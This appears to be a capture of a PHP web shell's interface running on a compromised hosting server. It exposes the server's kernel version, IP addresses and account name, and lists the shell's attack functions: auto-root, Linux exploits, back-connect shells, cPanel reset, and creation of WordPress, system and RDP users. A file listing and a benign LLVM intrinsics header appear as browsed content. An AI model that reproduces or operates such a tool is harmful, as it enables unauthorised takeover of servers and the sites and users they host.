Linux frigo.o2switch.net 4.18.0-553.123.2.lve.el8.x86_64 #1 SMP Thu May 7 23:17:13 UTC 2026 x86_64
Apache
: 109.234.164.159 | : 216.73.216.204
Cant Read [ /etc/named.conf ]
8.3.33
lavi4235
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
lib64 /
llvm17 /
lib /
clang /
17 /
include /
[ HOME SHELL ]
Name
Size
Permission
Action
cuda_wrappers
[ DIR ]
drwxr-xr-x
llvm_libc_wrappers
[ DIR ]
drwxr-xr-x
openmp_wrappers
[ DIR ]
drwxr-xr-x
ppc_wrappers
[ DIR ]
drwxr-xr-x
__clang_cuda_builtin_vars.h
4.78
KB
-rw-r--r--
__clang_cuda_cmath.h
18.06
KB
-rw-r--r--
__clang_cuda_complex_builtins....
9.36
KB
-rw-r--r--
__clang_cuda_device_functions....
56.68
KB
-rw-r--r--
__clang_cuda_intrinsics.h
29.93
KB
-rw-r--r--
__clang_cuda_libdevice_declare...
21.87
KB
-rw-r--r--
__clang_cuda_math.h
15.99
KB
-rw-r--r--
__clang_cuda_math_forward_decl...
8.27
KB
-rw-r--r--
__clang_cuda_runtime_wrapper.h
17.61
KB
-rw-r--r--
__clang_cuda_texture_intrinsic...
31.86
KB
-rw-r--r--
__clang_hip_cmath.h
26.34
KB
-rw-r--r--
__clang_hip_libdevice_declares...
19.87
KB
-rw-r--r--
__clang_hip_math.h
31.96
KB
-rw-r--r--
__clang_hip_runtime_wrapper.h
4.65
KB
-rw-r--r--
__clang_hip_stdlib.h
1.19
KB
-rw-r--r--
__stddef_max_align_t.h
857
B
-rw-r--r--
__wmmintrin_aes.h
5.15
KB
-rw-r--r--
__wmmintrin_pclmul.h
1.99
KB
-rw-r--r--
adxintrin.h
7.37
KB
-rw-r--r--
altivec.h
697.32
KB
-rw-r--r--
ammintrin.h
7.54
KB
-rw-r--r--
amxcomplexintrin.h
6.81
KB
-rw-r--r--
amxfp16intrin.h
1.82
KB
-rw-r--r--
amxintrin.h
21.12
KB
-rw-r--r--
arm64intr.h
993
B
-rw-r--r--
arm_acle.h
25.66
KB
-rw-r--r--
arm_bf16.h
548
B
-rw-r--r--
arm_cde.h
32.67
KB
-rw-r--r--
arm_cmse.h
6.21
KB
-rw-r--r--
arm_fp16.h
16.92
KB
-rw-r--r--
arm_mve.h
1.48
MB
-rw-r--r--
arm_neon.h
2.45
MB
-rw-r--r--
arm_neon_sve_bridge.h
9.48
KB
-rw-r--r--
arm_sme_draft_spec_subject_to_...
60.2
KB
-rw-r--r--
arm_sve.h
1.51
MB
-rw-r--r--
armintr.h
843
B
-rw-r--r--
avx2intrin.h
186.96
KB
-rw-r--r--
avx512bf16intrin.h
10.51
KB
-rw-r--r--
avx512bitalgintrin.h
2.41
KB
-rw-r--r--
avx512bwintrin.h
75.33
KB
-rw-r--r--
avx512cdintrin.h
4.12
KB
-rw-r--r--
avx512dqintrin.h
58.75
KB
-rw-r--r--
avx512erintrin.h
11.83
KB
-rw-r--r--
avx512fintrin.h
382.64
KB
-rw-r--r--
avx512fp16intrin.h
156.63
KB
-rw-r--r--
avx512ifmaintrin.h
2.49
KB
-rw-r--r--
avx512ifmavlintrin.h
4.31
KB
-rw-r--r--
avx512pfintrin.h
4.53
KB
-rw-r--r--
avx512vbmi2intrin.h
13.17
KB
-rw-r--r--
avx512vbmiintrin.h
3.72
KB
-rw-r--r--
avx512vbmivlintrin.h
6.94
KB
-rw-r--r--
avx512vlbf16intrin.h
19.21
KB
-rw-r--r--
avx512vlbitalgintrin.h
4.23
KB
-rw-r--r--
avx512vlbwintrin.h
121.26
KB
-rw-r--r--
avx512vlcdintrin.h
7.66
KB
-rw-r--r--
avx512vldqintrin.h
46.41
KB
-rw-r--r--
avx512vlfp16intrin.h
85.51
KB
-rw-r--r--
avx512vlintrin.h
322.29
KB
-rw-r--r--
avx512vlvbmi2intrin.h
25.72
KB
-rw-r--r--
avx512vlvnniintrin.h
13.13
KB
-rw-r--r--
avx512vlvp2intersectintrin.h
4.44
KB
-rw-r--r--
avx512vnniintrin.h
4.21
KB
-rw-r--r--
avx512vp2intersectintrin.h
2.9
KB
-rw-r--r--
avx512vpopcntdqintrin.h
2
KB
-rw-r--r--
avx512vpopcntdqvlintrin.h
3.31
KB
-rw-r--r--
avxifmaintrin.h
5.75
KB
-rw-r--r--
avxintrin.h
195.41
KB
-rw-r--r--
avxneconvertintrin.h
14.09
KB
-rw-r--r--
avxvnniint16intrin.h
17.41
KB
-rw-r--r--
avxvnniint8intrin.h
18.67
KB
-rw-r--r--
avxvnniintrin.h
10.44
KB
-rw-r--r--
bmi2intrin.h
7.09
KB
-rw-r--r--
bmiintrin.h
14.12
KB
-rw-r--r--
builtins.h
741
B
-rw-r--r--
cet.h
1.49
KB
-rw-r--r--
cetintrin.h
3.27
KB
-rw-r--r--
cldemoteintrin.h
1.18
KB
-rw-r--r--
clflushoptintrin.h
1.17
KB
-rw-r--r--
clwbintrin.h
1.2
KB
-rw-r--r--
clzerointrin.h
1.19
KB
-rw-r--r--
cmpccxaddintrin.h
2.33
KB
-rw-r--r--
cpuid.h
11.01
KB
-rw-r--r--
crc32intrin.h
3.27
KB
-rw-r--r--
emmintrin.h
192.64
KB
-rw-r--r--
enqcmdintrin.h
2.12
KB
-rw-r--r--
f16cintrin.h
5.39
KB
-rw-r--r--
float.h
5.63
KB
-rw-r--r--
fma4intrin.h
6.82
KB
-rw-r--r--
fmaintrin.h
28.4
KB
-rw-r--r--
fxsrintrin.h
2.82
KB
-rw-r--r--
gfniintrin.h
7.57
KB
-rw-r--r--
hexagon_circ_brev_intrinsics.h
15.59
KB
-rw-r--r--
hexagon_protos.h
374.42
KB
-rw-r--r--
hexagon_types.h
130.33
KB
-rw-r--r--
hresetintrin.h
1.36
KB
-rw-r--r--
htmintrin.h
6.14
KB
-rw-r--r--
htmxlintrin.h
9.01
KB
-rw-r--r--
hvx_hexagon_protos.h
254.26
KB
-rw-r--r--
ia32intrin.h
12.72
KB
-rw-r--r--
immintrin.h
23.57
KB
-rw-r--r--
intrin.h
28.22
KB
-rw-r--r--
inttypes.h
2.26
KB
-rw-r--r--
invpcidintrin.h
764
B
-rw-r--r--
iso646.h
656
B
-rw-r--r--
keylockerintrin.h
17.98
KB
-rw-r--r--
larchintrin.h
7.8
KB
-rw-r--r--
limits.h
3.61
KB
-rw-r--r--
lwpintrin.h
5
KB
-rw-r--r--
lzcntintrin.h
3.18
KB
-rw-r--r--
mm3dnow.h
4.5
KB
-rw-r--r--
mm_malloc.h
1.88
KB
-rw-r--r--
mmintrin.h
55.98
KB
-rw-r--r--
module.modulemap
3.33
KB
-rw-r--r--
movdirintrin.h
1.57
KB
-rw-r--r--
msa.h
25.01
KB
-rw-r--r--
mwaitxintrin.h
2.19
KB
-rw-r--r--
nmmintrin.h
709
B
-rw-r--r--
opencl-c-base.h
30.38
KB
-rw-r--r--
opencl-c.h
874.39
KB
-rw-r--r--
pconfigintrin.h
1.19
KB
-rw-r--r--
pkuintrin.h
934
B
-rw-r--r--
pmmintrin.h
10.5
KB
-rw-r--r--
popcntintrin.h
1.82
KB
-rw-r--r--
prfchiintrin.h
2.02
KB
-rw-r--r--
prfchwintrin.h
2.06
KB
-rw-r--r--
ptwriteintrin.h
1.05
KB
-rw-r--r--
raointintrin.h
6.59
KB
-rw-r--r--
rdpruintrin.h
1.59
KB
-rw-r--r--
rdseedintrin.h
2.85
KB
-rw-r--r--
riscv_ntlh.h
855
B
-rw-r--r--
rtmintrin.h
1.25
KB
-rw-r--r--
s390intrin.h
604
B
-rw-r--r--
serializeintrin.h
881
B
-rw-r--r--
sgxintrin.h
1.77
KB
-rw-r--r--
sha512intrin.h
5.95
KB
-rw-r--r--
shaintrin.h
7.37
KB
-rw-r--r--
sifive_vector.h
522
B
-rw-r--r--
sm3intrin.h
7.29
KB
-rw-r--r--
sm4intrin.h
8.2
KB
-rw-r--r--
smmintrin.h
99.32
KB
-rw-r--r--
stdalign.h
911
B
-rw-r--r--
stdarg.h
1.66
KB
-rw-r--r--
stdatomic.h
8.3
KB
-rw-r--r--
stdbool.h
1.04
KB
-rw-r--r--
stddef.h
4.16
KB
-rw-r--r--
stdint.h
32.49
KB
-rw-r--r--
stdnoreturn.h
1.17
KB
-rw-r--r--
tbmintrin.h
3.15
KB
-rw-r--r--
tgmath.h
29.68
KB
-rw-r--r--
tmmintrin.h
29.51
KB
-rw-r--r--
tsxldtrkintrin.h
1.97
KB
-rw-r--r--
uintrintrin.h
4.96
KB
-rw-r--r--
unwind.h
11.21
KB
-rw-r--r--
vadefs.h
1.39
KB
-rw-r--r--
vaesintrin.h
2.46
KB
-rw-r--r--
varargs.h
477
B
-rw-r--r--
vecintrin.h
360.82
KB
-rw-r--r--
velintrin.h
2.1
KB
-rw-r--r--
velintrin_approx.h
3.54
KB
-rw-r--r--
velintrin_gen.h
69.06
KB
-rw-r--r--
vpclmulqdqintrin.h
1.06
KB
-rw-r--r--
waitpkgintrin.h
1.33
KB
-rw-r--r--
wasm_simd128.h
76.25
KB
-rw-r--r--
wbnoinvdintrin.h
749
B
-rw-r--r--
wmmintrin.h
659
B
-rw-r--r--
x86gprintrin.h
2.32
KB
-rw-r--r--
x86intrin.h
1.81
KB
-rw-r--r--
xmmintrin.h
106.73
KB
-rw-r--r--
xopintrin.h
19.96
KB
-rw-r--r--
xsavecintrin.h
2.51
KB
-rw-r--r--
xsaveintrin.h
1.64
KB
-rw-r--r--
xsaveoptintrin.h
1
KB
-rw-r--r--
xsavesintrin.h
1.24
KB
-rw-r--r--
xtestintrin.h
873
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : avxvnniint8intrin.h
/*===-------- avxvnniint8intrin.h - AVXVNNIINT8 intrinsics -----------=== * * Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions. * See https://llvm.org/LICENSE.txt for license information. * SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception * *===-----------------------------------------------------------------------=== */ #ifndef __IMMINTRIN_H #error \ "Never use <avxvnniint8intrin.h> directly; include <immintrin.h> instead." #endif #ifndef __AVXVNNIINT8INTRIN_H #define __AVXVNNIINT8INTRIN_H /* Define the default attributes for the functions in this file. */ #define __DEFAULT_FN_ATTRS256 \ __attribute__((__always_inline__, __nodebug__, __target__("avxvnniint8"), \ __min_vector_width__(256))) #define __DEFAULT_FN_ATTRS128 \ __attribute__((__always_inline__, __nodebug__, __target__("avxvnniint8"), \ __min_vector_width__(128))) /// Multiply groups of 4 adjacent pairs of signed 8-bit integers in \a __A with /// corresponding signed 8-bit integers in \a __B, producing 4 intermediate /// signed 16-bit results. Sum these 4 results with the corresponding /// 32-bit integer in \a __W, and store the packed 32-bit results in \a dst. /// /// \headerfile <x86intrin.h> /// /// \code /// _mm_dpbssd_epi32(__m128i __W, __m128i __A, __m128i __B); /// \endcode /// /// This intrinsic corresponds to the \c VPDPBSSD instruction. /// /// \param __A /// A 128-bit vector of [16 x char]. /// \param __B /// A 128-bit vector of [16 x char]. /// \returns /// A 128-bit vector of [4 x int]. /// /// \code{.operation} /// FOR j := 0 to 3 /// tmp1.word := SignExtend16(__A.byte[4*j]) * SignExtend16(__B.byte[4*j]) /// tmp2.word := SignExtend16(__A.byte[4*j+1]) * SignExtend16(__B.byte[4*j+1]) /// tmp3.word := SignExtend16(__A.byte[4*j+2]) * SignExtend16(__B.byte[4*j+2]) /// tmp4.word := SignExtend16(__A.byte[4*j+3]) * SignExtend16(__B.byte[4*j+3]) /// dst.dword[j] := __W.dword[j] + tmp1 + tmp2 + tmp3 + tmp4 /// ENDFOR /// dst[MAX:128] := 0 /// \endcode static __inline__ __m128i __DEFAULT_FN_ATTRS128 _mm_dpbssd_epi32(__m128i __W, __m128i __A, __m128i __B) { return (__m128i)__builtin_ia32_vpdpbssd128((__v4si)__W, (__v4si)__A, (__v4si)__B); } /// Multiply groups of 4 adjacent pairs of signed 8-bit integers in \a __A with /// corresponding signed 8-bit integers in \a __B, producing 4 intermediate /// signed 16-bit results. Sum these 4 results with the corresponding /// 32-bit integer in \a __W, and store the packed 32-bit results in \a dst. /// /// \headerfile <x86intrin.h> /// /// \code /// _mm256_dpbssd_epi32(__m256i __W, __m256i __A, __m256i __B); /// \endcode /// /// This intrinsic corresponds to the \c VPDPBSSD instruction. /// /// \param __A /// A 256-bit vector of [32 x char]. /// \param __B /// A 256-bit vector of [32 x char]. /// \returns /// A 256-bit vector of [8 x int]. /// /// \code{.operation} /// FOR j := 0 to 7 /// tmp1.word := SignExtend16(__A.byte[4*j]) * SignExtend16(__B.byte[4*j]) /// tmp2.word := SignExtend16(__A.byte[4*j+1]) * SignExtend16(__B.byte[4*j+1]) /// tmp3.word := SignExtend16(__A.byte[4*j+2]) * SignExtend16(__B.byte[4*j+2]) /// tmp4.word := SignExtend16(__A.byte[4*j+3]) * SignExtend16(__B.byte[4*j+3]) /// dst.dword[j] := __W.dword[j] + tmp1 + tmp2 + tmp3 + tmp4 /// ENDFOR /// dst[MAX:256] := 0 /// \endcode static __inline__ __m256i __DEFAULT_FN_ATTRS256 _mm256_dpbssd_epi32(__m256i __W, __m256i __A, __m256i __B) { return (__m256i)__builtin_ia32_vpdpbssd256((__v8si)__W, (__v8si)__A, (__v8si)__B); } /// Multiply groups of 4 adjacent pairs of signed 8-bit integers in \a __A with /// corresponding signed 8-bit integers in \a __B, producing 4 intermediate /// signed 16-bit results. Sum these 4 results with the corresponding /// 32-bit integer in \a __W with signed saturation, and store the packed /// 32-bit results in \a dst. /// /// \headerfile <x86intrin.h> /// /// \code /// _mm_dpbssds_epi32( __m128i __W, __m128i __A, __m128i __B); /// \endcode /// /// This intrinsic corresponds to the \c VPDPBSSD instruction. /// /// \param __A /// A 128-bit vector of [16 x char]. /// \param __B /// A 128-bit vector of [16 x char]. /// \returns /// A 128-bit vector of [4 x int]. /// /// \code{.operation} /// FOR j := 0 to 3 /// tmp1.word := SignExtend16(__A.byte[4*j]) * SignExtend16(__B.byte[4*j]) /// tmp2.word := SignExtend16(__A.byte[4*j+1]) * SignExtend16(__B.byte[4*j+1]) /// tmp3.word := SignExtend16(__A.byte[4*j+2]) * SignExtend16(__B.byte[4*j+2]) /// tmp4.word := SignExtend16(__A.byte[4*j+3]) * SignExtend16(__B.byte[4*j+3]) /// dst.dword[j] := SIGNED_DWORD_SATURATE(__W.dword[j] + tmp1 + tmp2 + tmp3 + tmp4) /// ENDFOR /// dst[MAX:128] := 0 /// \endcode static __inline__ __m128i __DEFAULT_FN_ATTRS128 _mm_dpbssds_epi32(__m128i __W, __m128i __A, __m128i __B) { return (__m128i)__builtin_ia32_vpdpbssds128((__v4si)__W, (__v4si)__A, (__v4si)__B); } /// Multiply groups of 4 adjacent pairs of signed 8-bit integers in \a __A with /// corresponding signed 8-bit integers in \a __B, producing 4 intermediate /// signed 16-bit results. Sum these 4 results with the corresponding /// 32-bit integer in \a __W with signed saturation, and store the packed /// 32-bit results in \a dst. /// /// \headerfile <x86intrin.h> /// /// \code /// _mm256_dpbssds_epi32(__m256i __W, __m256i __A, __m256i __B); /// \endcode /// /// This intrinsic corresponds to the \c VPDPBSSD instruction. /// /// \param __A /// A 256-bit vector of [32 x char]. /// \param __B /// A 256-bit vector of [32 x char]. /// \returns /// A 256-bit vector of [8 x int]. /// /// \code{.operation} /// FOR j := 0 to 7 /// tmp1.word := SignExtend16(__A.byte[4*j]) * SignExtend16(__B.byte[4*j]) /// tmp2.word := SignExtend16(__A.byte[4*j+1]) * SignExtend16(__B.byte[4*j+1]) /// tmp3.word := SignExtend16(__A.byte[4*j+2]) * SignExtend16(__B.byte[4*j+2]) /// tmp4.word := SignExtend16(__A.byte[4*j+3]) * SignExtend16(__B.byte[4*j+3]) /// dst.dword[j] := SIGNED_DWORD_SATURATE(__W.dword[j] + tmp1 + tmp2 + tmp3 + tmp4) /// ENDFOR /// dst[MAX:256] := 0 /// \endcode static __inline__ __m256i __DEFAULT_FN_ATTRS256 _mm256_dpbssds_epi32(__m256i __W, __m256i __A, __m256i __B) { return (__m256i)__builtin_ia32_vpdpbssds256((__v8si)__W, (__v8si)__A, (__v8si)__B); } /// Multiply groups of 4 adjacent pairs of signed 8-bit integers in \a __A with /// corresponding unsigned 8-bit integers in \a __B, producing 4 intermediate /// signed 16-bit results. Sum these 4 results with the corresponding /// 32-bit integer in \a __W, and store the packed 32-bit results in \a dst. /// /// \headerfile <x86intrin.h> /// /// \code /// _mm_dpbsud_epi32(__m128i __W, __m128i __A, __m128i __B); /// \endcode /// /// This intrinsic corresponds to the \c VPDPBSSD instruction. /// /// \param __A /// A 128-bit vector of [16 x char]. /// \param __B /// A 128-bit vector of [16 x unsigned char]. /// \returns /// A 128-bit vector of [4 x int]. /// /// \code{.operation} /// FOR j := 0 to 3 /// tmp1.word := Signed(SignExtend16(__A.byte[4*j]) * ZeroExtend16(__B.byte[4*j])) /// tmp2.word := Signed(SignExtend16(__A.byte[4*j+1]) * ZeroExtend16(__B.byte[4*j+1])) /// tmp3.word := Signed(SignExtend16(__A.byte[4*j+2]) * ZeroExtend16(__B.byte[4*j+2])) /// tmp4.word := Signed(SignExtend16(__A.byte[4*j+3]) * ZeroExtend16(__B.byte[4*j+3])) /// dst.dword[j] := __W.dword[j] + tmp1 + tmp2 + tmp3 + tmp4 /// ENDFOR /// dst[MAX:128] := 0 /// \endcode static __inline__ __m128i __DEFAULT_FN_ATTRS128 _mm_dpbsud_epi32(__m128i __W, __m128i __A, __m128i __B) { return (__m128i)__builtin_ia32_vpdpbsud128((__v4si)__W, (__v4si)__A, (__v4si)__B); } /// Multiply groups of 4 adjacent pairs of signed 8-bit integers in \a __A with /// corresponding unsigned 8-bit integers in \a __B, producing 4 intermediate /// signed 16-bit results. Sum these 4 results with the corresponding /// 32-bit integer in \a __W, and store the packed 32-bit results in \a dst. /// /// \headerfile <x86intrin.h> /// /// \code /// _mm256_dpbsud_epi32(__m256i __W, __m256i __A, __m256i __B); /// \endcode /// /// This intrinsic corresponds to the \c VPDPBSSD instruction. /// /// \param __A /// A 256-bit vector of [32 x char]. /// \param __B /// A 256-bit vector of [32 x unsigned char]. /// \returns /// A 256-bit vector of [8 x int]. /// /// \code{.operation} /// FOR j := 0 to 7 /// tmp1.word := Signed(SignExtend16(__A.byte[4*j]) * ZeroExtend16(__B.byte[4*j])) /// tmp2.word := Signed(SignExtend16(__A.byte[4*j+1]) * ZeroExtend16(__B.byte[4*j+1])) /// tmp3.word := Signed(SignExtend16(__A.byte[4*j+2]) * ZeroExtend16(__B.byte[4*j+2])) /// tmp4.word := Signed(SignExtend16(__A.byte[4*j+3]) * ZeroExtend16(__B.byte[4*j+3])) /// dst.dword[j] := __W.dword[j] + tmp1 + tmp2 + tmp3 + tmp4 /// ENDFOR /// dst[MAX:256] := 0 /// \endcode static __inline__ __m256i __DEFAULT_FN_ATTRS256 _mm256_dpbsud_epi32(__m256i __W, __m256i __A, __m256i __B) { return (__m256i)__builtin_ia32_vpdpbsud256((__v8si)__W, (__v8si)__A, (__v8si)__B); } /// Multiply groups of 4 adjacent pairs of signed 8-bit integers in \a __A with /// corresponding unsigned 8-bit integers in \a __B, producing 4 intermediate /// signed 16-bit results. Sum these 4 results with the corresponding /// 32-bit integer in \a __W with signed saturation, and store the packed /// 32-bit results in \a dst. /// /// \headerfile <x86intrin.h> /// /// \code /// _mm_dpbsuds_epi32( __m128i __W, __m128i __A, __m128i __B); /// \endcode /// /// This intrinsic corresponds to the \c VPDPBSSD instruction. /// /// \param __A /// A 128-bit vector of [16 x char]. /// \param __B /// A 128-bit vector of [16 x unsigned char]. /// \returns /// A 128-bit vector of [4 x int]. /// /// \code{.operation} /// FOR j := 0 to 3 /// tmp1.word := Signed(SignExtend16(__A.byte[4*j]) * ZeroExtend16(__B.byte[4*j])) /// tmp2.word := Signed(SignExtend16(__A.byte[4*j+1]) * ZeroExtend16(__B.byte[4*j+1])) /// tmp3.word := Signed(SignExtend16(__A.byte[4*j+2]) * ZeroExtend16(__B.byte[4*j+2])) /// tmp4.word := Signed(SignExtend16(__A.byte[4*j+3]) * ZeroExtend16(__B.byte[4*j+3])) /// dst.dword[j] := SIGNED_DWORD_SATURATE(__W.dword[j] + tmp1 + tmp2 + tmp3 + tmp4) /// ENDFOR /// dst[MAX:128] := 0 /// \endcode static __inline__ __m128i __DEFAULT_FN_ATTRS128 _mm_dpbsuds_epi32(__m128i __W, __m128i __A, __m128i __B) { return (__m128i)__builtin_ia32_vpdpbsuds128((__v4si)__W, (__v4si)__A, (__v4si)__B); } /// Multiply groups of 4 adjacent pairs of signed 8-bit integers in \a __A with /// corresponding unsigned 8-bit integers in \a __B, producing 4 intermediate /// signed 16-bit results. Sum these 4 results with the corresponding /// 32-bit integer in \a __W with signed saturation, and store the packed /// 32-bit results in \a dst. /// /// \headerfile <x86intrin.h> /// /// \code /// _mm256_dpbsuds_epi32(__m256i __W, __m256i __A, __m256i __B); /// \endcode /// /// This intrinsic corresponds to the \c VPDPBSSD instruction. /// /// \param __A /// A 256-bit vector of [32 x char]. /// \param __B /// A 256-bit vector of [32 x unsigned char]. /// \returns /// A 256-bit vector of [8 x int]. /// /// \code{.operation} /// FOR j := 0 to 7 /// tmp1.word := Signed(SignExtend16(__A.byte[4*j]) * ZeroExtend16(__B.byte[4*j])) /// tmp2.word := Signed(SignExtend16(__A.byte[4*j+1]) * ZeroExtend16(__B.byte[4*j+1])) /// tmp3.word := Signed(SignExtend16(__A.byte[4*j+2]) * ZeroExtend16(__B.byte[4*j+2])) /// tmp4.word := Signed(SignExtend16(__A.byte[4*j+3]) * ZeroExtend16(__B.byte[4*j+3])) /// dst.dword[j] := SIGNED_DWORD_SATURATE(__W.dword[j] + tmp1 + tmp2 + tmp3 + tmp4) /// ENDFOR /// dst[MAX:256] := 0 /// \endcode static __inline__ __m256i __DEFAULT_FN_ATTRS256 _mm256_dpbsuds_epi32(__m256i __W, __m256i __A, __m256i __B) { return (__m256i)__builtin_ia32_vpdpbsuds256((__v8si)__W, (__v8si)__A, (__v8si)__B); } /// Multiply groups of 4 adjacent pairs of unsigned 8-bit integers in \a __A with /// corresponding unsigned 8-bit integers in \a __B, producing 4 intermediate /// signed 16-bit results. Sum these 4 results with the corresponding /// 32-bit integer in \a __W, and store the packed 32-bit results in \a dst. /// /// \headerfile <x86intrin.h> /// /// \code /// _mm_dpbuud_epi32(__m128i __W, __m128i __A, __m128i __B); /// \endcode /// /// This intrinsic corresponds to the \c VPDPBSSD instruction. /// /// \param __A /// A 128-bit vector of [16 x unsigned char]. /// \param __B /// A 128-bit vector of [16 x unsigned char]. /// \returns /// A 128-bit vector of [4 x int]. /// /// \code{.operation} /// FOR j := 0 to 3 /// tmp1.word := ZeroExtend16(__A.byte[4*j]) * ZeroExtend16(__B.byte[4*j]) /// tmp2.word := ZeroExtend16(__A.byte[4*j+1]) * ZeroExtend16(__B.byte[4*j+1]) /// tmp3.word := ZeroExtend16(__A.byte[4*j+2]) * ZeroExtend16(__B.byte[4*j+2]) /// tmp4.word := ZeroExtend16(__A.byte[4*j+3]) * ZeroExtend16(__B.byte[4*j+3]) /// dst.dword[j] := __W.dword[j] + tmp1 + tmp2 + tmp3 + tmp4 /// ENDFOR /// dst[MAX:128] := 0 /// \endcode static __inline__ __m128i __DEFAULT_FN_ATTRS128 _mm_dpbuud_epi32(__m128i __W, __m128i __A, __m128i __B) { return (__m128i)__builtin_ia32_vpdpbuud128((__v4si)__W, (__v4si)__A, (__v4si)__B); } /// Multiply groups of 4 adjacent pairs of unsigned 8-bit integers in \a __A with /// corresponding unsigned 8-bit integers in \a __B, producing 4 intermediate /// signed 16-bit results. Sum these 4 results with the corresponding /// 32-bit integer in \a __W, and store the packed 32-bit results in \a dst. /// /// \headerfile <x86intrin.h> /// /// \code /// _mm256_dpbuud_epi32(__m256i __W, __m256i __A, __m256i __B); /// \endcode /// /// This intrinsic corresponds to the \c VPDPBSSD instruction. /// /// \param __A /// A 256-bit vector of [32 x unsigned char]. /// \param __B /// A 256-bit vector of [32 x unsigned char]. /// \returns /// A 256-bit vector of [8 x int]. /// /// \code{.operation} /// FOR j := 0 to 7 /// tmp1.word := ZeroExtend16(__A.byte[4*j]) * ZeroExtend16(__B.byte[4*j]) /// tmp2.word := ZeroExtend16(__A.byte[4*j+1]) * ZeroExtend16(__B.byte[4*j+1]) /// tmp3.word := ZeroExtend16(__A.byte[4*j+2]) * ZeroExtend16(__B.byte[4*j+2]) /// tmp4.word := ZeroExtend16(__A.byte[4*j+3]) * ZeroExtend16(__B.byte[4*j+3]) /// dst.dword[j] := __W.dword[j] + tmp1 + tmp2 + tmp3 + tmp4 /// ENDFOR /// dst[MAX:256] := 0 /// \endcode static __inline__ __m256i __DEFAULT_FN_ATTRS256 _mm256_dpbuud_epi32(__m256i __W, __m256i __A, __m256i __B) { return (__m256i)__builtin_ia32_vpdpbuud256((__v8si)__W, (__v8si)__A, (__v8si)__B); } /// Multiply groups of 4 adjacent pairs of unsigned 8-bit integers in \a __A with /// corresponding unsigned 8-bit integers in \a __B, producing 4 intermediate /// signed 16-bit results. Sum these 4 results with the corresponding /// 32-bit integer in \a __W with signed saturation, and store the packed /// 32-bit results in \a dst. /// /// \headerfile <x86intrin.h> /// /// \code /// _mm_dpbuuds_epi32( __m128i __W, __m128i __A, __m128i __B); /// \endcode /// /// This intrinsic corresponds to the \c VPDPBUUDS instruction. /// /// \param __A /// A 128-bit vector of [16 x unsigned char]. /// \param __B /// A 128-bit vector of [16 x unsigned char]. /// \returns /// A 128-bit vector of [4 x int]. /// /// \code{.operation} /// FOR j := 0 to 3 /// tmp1.word := ZeroExtend16(__A.byte[4*j]) * ZeroExtend16(__B.byte[4*j]) /// tmp2.word := ZeroExtend16(__A.byte[4*j+1]) * ZeroExtend16(__B.byte[4*j+1]) /// tmp3.word := ZeroExtend16(__A.byte[4*j+2]) * ZeroExtend16(__B.byte[4*j+2]) /// tmp4.word := ZeroExtend16(__A.byte[4*j+3]) * ZeroExtend16(__B.byte[4*j+3]) /// dst.dword[j] := UNSIGNED_DWORD_SATURATE(__W.dword[j] + tmp1 + tmp2 + tmp3 + tmp4) /// ENDFOR /// dst[MAX:128] := 0 /// \endcode static __inline__ __m128i __DEFAULT_FN_ATTRS128 _mm_dpbuuds_epi32(__m128i __W, __m128i __A, __m128i __B) { return (__m128i)__builtin_ia32_vpdpbuuds128((__v4si)__W, (__v4si)__A, (__v4si)__B); } /// Multiply groups of 4 adjacent pairs of signed 8-bit integers in \a __A with /// corresponding unsigned 8-bit integers in \a __B, producing 4 intermediate /// signed 16-bit results. Sum these 4 results with the corresponding /// 32-bit integer in \a __W with signed saturation, and store the packed /// 32-bit results in \a dst. /// /// \headerfile <x86intrin.h> /// /// \code /// _mm256_dpbuuds_epi32(__m256i __W, __m256i __A, __m256i __B); /// \endcode /// /// This intrinsic corresponds to the \c VPDPBUUDS instruction. /// /// \param __A /// A 256-bit vector of [32 x unsigned char]. /// \param __B /// A 256-bit vector of [32 x unsigned char]. /// \returns /// A 256-bit vector of [8 x int]. /// /// \code{.operation} /// FOR j := 0 to 7 /// tmp1.word := ZeroExtend16(__A.byte[4*j]) * ZeroExtend16(__B.byte[4*j]) /// tmp2.word := ZeroExtend16(__A.byte[4*j+1]) * ZeroExtend16(__B.byte[4*j+1]) /// tmp3.word := ZeroExtend16(__A.byte[4*j+2]) * ZeroExtend16(__B.byte[4*j+2]) /// tmp4.word := ZeroExtend16(__A.byte[4*j+3]) * ZeroExtend16(__B.byte[4*j+3]) /// dst.dword[j] := UNSIGNED_DWORD_SATURATE(__W.dword[j] + tmp1 + tmp2 + tmp3 + tmp4) /// ENDFOR /// dst[MAX:256] := 0 /// \endcode static __inline__ __m256i __DEFAULT_FN_ATTRS256 _mm256_dpbuuds_epi32(__m256i __W, __m256i __A, __m256i __B) { return (__m256i)__builtin_ia32_vpdpbuuds256((__v8si)__W, (__v8si)__A, (__v8si)__B); } #undef __DEFAULT_FN_ATTRS128 #undef __DEFAULT_FN_ATTRS256 #endif // __AVXVNNIINT8INTRIN_H
Close